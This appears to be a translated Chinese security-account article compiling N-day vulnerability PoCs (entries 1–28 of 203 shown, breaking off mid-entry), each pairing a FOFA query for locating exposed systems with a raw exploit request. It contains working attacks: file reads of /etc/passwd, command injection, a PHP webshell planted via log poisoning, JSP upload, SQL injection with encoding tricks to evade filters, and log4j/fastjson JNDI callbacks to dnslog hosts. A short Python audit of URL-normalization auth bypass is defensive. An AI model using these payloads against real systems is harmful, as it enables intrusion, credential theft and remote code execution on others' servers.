Public Internet vulnerability roundup, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article originally appeared on 网络安全新视界 (author: 网络安全新视界).

Purpose: exploitation of N-day vulnerabilities accounts for a large share of the attacks seen in offensive/defensive exercises, and this article is meant to help the defending side. Defenders can use the entries below to screen their own assets for exposure.

Sources: the article collects 203 PoCs for high-impact vulnerabilities published in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites and were compiled and published by the 网络安全新视界 team.

Patches: every vulnerability listed here is already public; contact the product vendor for patches or remediation guidance.

Content: because of length limits, a few PoCs that are too long are abbreviated with the word PAYLOAD; search for the full PoC yourself if you need it.

Legal: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend and the content will be removed.

Statement
To keep things simple and easy to browse, there is no "reply to get the full list" gate: this article is the complete list. Press F12 and search for a keyword to find an entry.

Bookmark this article if it is useful to you, or follow the public account (网络安全新视界).

Contents

01
1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice 医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华ICC intelligent IoT management platform arbitrary file read
21. 大华ICC intelligent IoT management platform random remote code execution
22. 大华ICC intelligent IoT management platform log4j remote code execution
23. 大华ICC intelligent IoT management platform fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud government finance cloud arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ K
eyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 permission bypass
66. 万户ezOFFICE collaboration platform SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 掌上校园 service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康NS-ASG application security gateway index.php SQL injection
135. 网康NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass / template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system (PACS) WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6 vehicle GPS monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS 海洋影视 management system dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

PoC list

02
1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of the password you want the new account to have.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. 深信服 NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin interface with the default account admin, then send the request below. The sysauth cookie and the stok session token in the path come from that login; the command is injected through the wifiRebootrange field (12:00; id;).
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained at login>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double URL-encoding of the following statement (a single decode pass still leaves the parentheses and quotes encoded, so a filter that decodes once does not see the query):

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
The check is 1=@@version: on SQL Server the comparison fails to convert the version string to an integer, and the resulting error message echoes the version.
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: fetch the login page to obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is reused in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST the login form. The language parameter traverses into application/logs, and the login field carries a PHP stub that runs the base64-decoded value of the request header K1SYJPMHLU4Z through system().
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor


Step 3: send the following request to the target to execute the id command. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command (it decodes to echo ---------;id 2>&1;echo ---------;).
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

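Entries 14 and 15 reach the same protected handler through two differently shaped URIs. The reason is that a Spring Boot application (the stack jshERP-boot runs on) sees a path only after the servlet container has collapsed "/../" segments and Spring has stripped matrix variables (the ";.ico" suffix) from each segment, whereas a hand-written login filter that compares the raw request URI, or skips anything that looks like a static resource, never sees that normalised form. The example below is added here and is not part of the original article or of jshERP; it assumes a single protected route and mimics the normalisation so that the raw URI and the resolved path can be compared side by side.

```python
from urllib.parse import unquote

# Route taken from the PoC above; assumed to be the only protected path.
PROTECTED = {"/jshERP-boot/user/getAllList"}

def strip_matrix_vars(path: str) -> str:
    """Drop ';key=value' (or a bare ';.ico') from every path segment,
    as Spring's UrlPathHelper does by default before handler mapping."""
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))

def normalize(path: str) -> str:
    """Percent-decode, strip matrix variables and collapse '.' / '..'
    segments, which is what the container and framework do before a
    controller is selected."""
    path = strip_matrix_vars(unquote(path))
    out = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)

def raw_path(request_target: str) -> str:
    """Path part of a request target, without the query string."""
    return request_target.split("?", 1)[0]

def naive_is_protected(request_target: str) -> bool:
    """Verdict of a filter that compares the raw request URI verbatim."""
    return raw_path(request_target) in PROTECTED

def really_protected(request_target: str) -> bool:
    """Verdict after the normalisation the framework applies."""
    return normalize(raw_path(request_target)) in PROTECTED

def audit(request_target: str) -> dict:
    """Both verdicts side by side. 'bypass' is True when the handler is
    reached but the raw-URI filter would not have fired."""
    filter_blocks = naive_is_protected(request_target)
    handler_reached = really_protected(request_target)
    return {
        "raw": request_target,
        "resolved": normalize(raw_path(request_target)),
        "filter_blocks": filter_blocks,
        "handler_reached": handler_reached,
        "bypass": handler_reached and not filter_blocks,
    }

if __name__ == "__main__":
    for target in ("/jshERP-boot/user/getAllList;.ico",
                   "/jshERP-boot/user/a.ico/../getAllList",
                   "/jshERP-boot/user/getAllList",
                   "/jshERP-boot/user/getAllList.ico"):
        print(audit(target))
```

The practical lesson for reviewing similar applications: authorisation decisions must be made on the path the framework actually dispatches on, not on the raw URI, and a static-resource exemption must be based on the resolved path too. Spring Security's StrictHttpFirewall rejects both ";" and "/../" in the request URI by default, which is why this class of bypass is usually found in projects that implement their own servlet filter instead.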
16. 红帆HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The injected expression makes the database compute HASHBYTES('MD5', '1234'), i.e. the MD5 of 1234, as the injection check.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
<netMarkings>
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
</netMarkings>
</ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>


18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. 大华ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
The body is a fastjson autotype probe: a java.net.URL object used as a JSON key makes the server resolve the hostname, so a hit on the DNS log confirms the parser accepts @type.
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}


22. 大华ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}


23. 大华ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://DNSLOG"}
}""
}

24. 用友NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. 用友NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. 用友NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. 用友 NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. 用友NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
